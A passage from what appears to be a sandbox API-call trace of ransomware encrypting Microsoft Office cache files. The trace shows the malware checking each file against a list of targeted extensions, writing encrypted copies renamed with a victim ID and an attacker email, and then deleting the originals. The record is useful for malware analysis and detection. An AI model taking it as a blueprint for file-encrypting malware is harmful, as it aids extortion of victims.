lpNumberOfBytesWritten=0x326fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0043.743] SetEndOfFile (hFile=0x208) returned 1 [0043.969] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0043.973] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.973] WriteFile (in: hFile=0x208, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.050] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.050] WriteFile (in: hFile=0x208, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.050] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.051] WriteFile (in: hFile=0x208, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.052] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0044.052] CloseHandle (hObject=0x208) returned 1 [0044.107] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.107] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.107] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.107] lstrlenW (lpString=".doc") returned 4 [0044.107] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.107] lstrlenW (lpString=".docx") returned 5 [0044.107] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.107] lstrlenW (lpString=".pdf") returned 4 [0044.107] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.107] lstrlenW (lpString=".xls") returned 4 [0044.107] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.107] lstrlenW (lpString=".xlsx") returned 5 [0044.107] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.108] lstrlenW (lpString=".ppt") returned 4 [0044.108] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.108] lstrlenW (lpString=".zip") returned 4 [0044.108] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString=".rar") returned 4 [0044.108] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString=".bz2") returned 4 [0044.108] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.108] lstrlenW (lpString=".7z") returned 3 [0044.108] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.108] lstrlenW (lpString=".dbf") returned 4 [0044.108] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.108] lstrlenW (lpString=".1cd") returned 4 [0044.108] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.108] lstrlenW (lpString=".jpg") returned 4 [0044.108] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.108] lstrlenW (lpString=".doc") returned 4 [0044.108] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString=".docx") returned 5 [0044.108] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.108] lstrlenW (lpString=".pdf") returned 4 [0044.108] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString=".xls") returned 4 [0044.108] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString=".xlsx") returned 5 [0044.108] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.108] lstrlenW (lpString=".ppt") returned 4 [0044.108] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.108] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.109] lstrlenW (lpString=".zip") returned 4 [0044.109] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.109] lstrlenW (lpString=".rar") returned 4 [0044.109] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.109] lstrlenW (lpString=".bz2") returned 4 [0044.109] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.109] lstrlenW (lpString=".7z") returned 3 [0044.109] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.109] lstrlenW (lpString=".dbf") returned 4 [0044.109] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.109] lstrlenW (lpString=".1cd") returned 4 [0044.109] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.109] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.109] lstrlenW (lpString=".jpg") returned 4 [0044.109] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.109] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0044.109] lstrlenW (lpString="osetupui.dll") returned 12 [0044.109] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0044.334] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=191872) returned 1 [0044.334] CloseHandle (hObject=0x16c) returned 1 [0044.336] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 0x2020 [0044.336] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.336] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0044.336] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.336] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.336] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.336] GetLastError () returned 0x0 [0044.336] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x2ed80, lpOverlapped=0x0) returned 1 [0044.343] WriteFile (in: hFile=0x1d8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x2ed90, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x2ed90, lpOverlapped=0x0) returned 1 [0044.346] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.347] WriteFile (in: hFile=0x1d8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.347] SetEndOfFile (hFile=0x1d8) returned 1 [0044.347] CloseHandle (hObject=0x1d8) returned 1 [0044.347] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.347] SetEndOfFile (hFile=0x16c) returned 1 [0044.349] CloseHandle (hObject=0x16c) returned 1 [0044.349] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.349] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 1 [0044.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.349] lstrlenW (lpString=".doc") returned 4 [0044.349] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.349] lstrlenW (lpString=".docx") returned 5 [0044.349] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0044.349] lstrlenW (lpString=".pdf") returned 4 [0044.349] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.349] lstrlenW (lpString=".xls") returned 4 [0044.350] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.350] lstrlenW (lpString=".xlsx") returned 5 [0044.350] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0044.350] lstrlenW (lpString=".ppt") returned 4 [0044.350] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.350] lstrlenW (lpString=".zip") returned 4 [0044.350] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.350] lstrlenW (lpString=".rar") returned 4 [0044.350] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.350] lstrlenW (lpString=".bz2") returned 4 [0044.350] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.350] lstrlenW (lpString=".7z") returned 3 [0044.350] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.350] lstrlenW (lpString=".dbf") returned 4 [0044.350] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.350] lstrlenW (lpString=".1cd") returned 4 [0044.350] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.350] lstrlenW (lpString=".jpg") returned 4 [0044.350] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.350] lstrlenW (lpString=".doc") returned 4 [0044.350] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.350] lstrlenW (lpString=".docx") returned 5 [0044.350] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0044.350] lstrlenW (lpString=".pdf") returned 4 [0044.350] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.350] lstrlenW (lpString=".xls") returned 4 [0044.350] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.350] lstrlenW (lpString=".xlsx") returned 5 [0044.351] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0044.351] lstrlenW (lpString=".ppt") returned 4 [0044.351] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.351] lstrlenW (lpString=".zip") returned 4 [0044.351] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.351] lstrlenW (lpString=".rar") returned 4 [0044.351] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.351] lstrlenW (lpString=".bz2") returned 4 [0044.351] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.351] lstrlenW (lpString=".7z") returned 3 [0044.351] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.351] lstrlenW (lpString=".dbf") returned 4 [0044.351] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.351] lstrlenW (lpString=".1cd") returned 4 [0044.351] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.351] lstrlenW (lpString=".jpg") returned 4 [0044.351] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.351] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0044.351] lstrlenW (lpString="Office32WW.msi") returned 14 [0044.351] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0044.352] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=1992192) returned 1 [0044.352] CloseHandle (hObject=0x16c) returned 1 [0044.352] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0044.352] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.352] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0044.352] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0044.352] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.352] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.352] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.357] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.357] ReadFile (in: hFile=0x16c, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.360] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.360] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.360] ReadFile (in: hFile=0x16c, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.374] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.374] WriteFile (in: hFile=0x16c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0044.615] SetEndOfFile (hFile=0x16c) returned 1 [0044.615] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0044.753] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.753] WriteFile (in: hFile=0x16c, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.755] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.755] WriteFile (in: hFile=0x16c, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.757] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.757] WriteFile (in: hFile=0x16c, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.759] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0044.759] CloseHandle (hObject=0x16c) returned 1 [0044.760] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.760] lstrlenW (lpString=".doc") returned 4 [0044.760] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.760] lstrlenW (lpString=".docx") returned 5 [0044.760] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0044.760] lstrlenW (lpString=".pdf") returned 4 [0044.760] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.760] lstrlenW (lpString=".xls") returned 4 [0044.760] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.760] lstrlenW (lpString=".xlsx") returned 5 [0044.760] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0044.760] lstrlenW (lpString=".ppt") returned 4 [0044.760] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.760] lstrlenW (lpString=".zip") returned 4 [0044.760] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.760] lstrlenW (lpString=".rar") returned 4 [0044.760] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.760] lstrlenW (lpString=".bz2") returned 4 [0044.760] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.760] lstrlenW (lpString=".7z") returned 3 [0044.760] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.760] lstrlenW (lpString=".dbf") returned 4 [0044.760] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.760] lstrlenW (lpString=".1cd") returned 4 [0044.761] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.761] lstrlenW (lpString=".jpg") returned 4 [0044.761] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.761] lstrlenW (lpString=".doc") returned 4 [0044.761] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.761] lstrlenW (lpString=".docx") returned 5 [0044.761] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0044.761] lstrlenW (lpString=".pdf") returned 4 [0044.761] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.761] lstrlenW (lpString=".xls") returned 4 [0044.761] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.761] lstrlenW (lpString=".xlsx") returned 5 [0044.761] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0044.761] lstrlenW (lpString=".ppt") returned 4 [0044.761] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.761] lstrlenW (lpString=".zip") returned 4 [0044.761] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.761] lstrlenW (lpString=".rar") returned 4 [0044.761] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.761] lstrlenW (lpString=".bz2") returned 4 [0044.761] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.761] lstrlenW (lpString=".7z") returned 3 [0044.761] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.761] lstrlenW (lpString=".dbf") returned 4 [0044.761] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.761] lstrlenW (lpString=".1cd") returned 4 [0044.761] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0044.761] lstrlenW (lpString=".jpg") returned 4 [0044.761] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.762] lstrcmpiW (lpString1=".xrm-ms", lpString2=".0day") returned 1 [0044.762] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0044.762] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 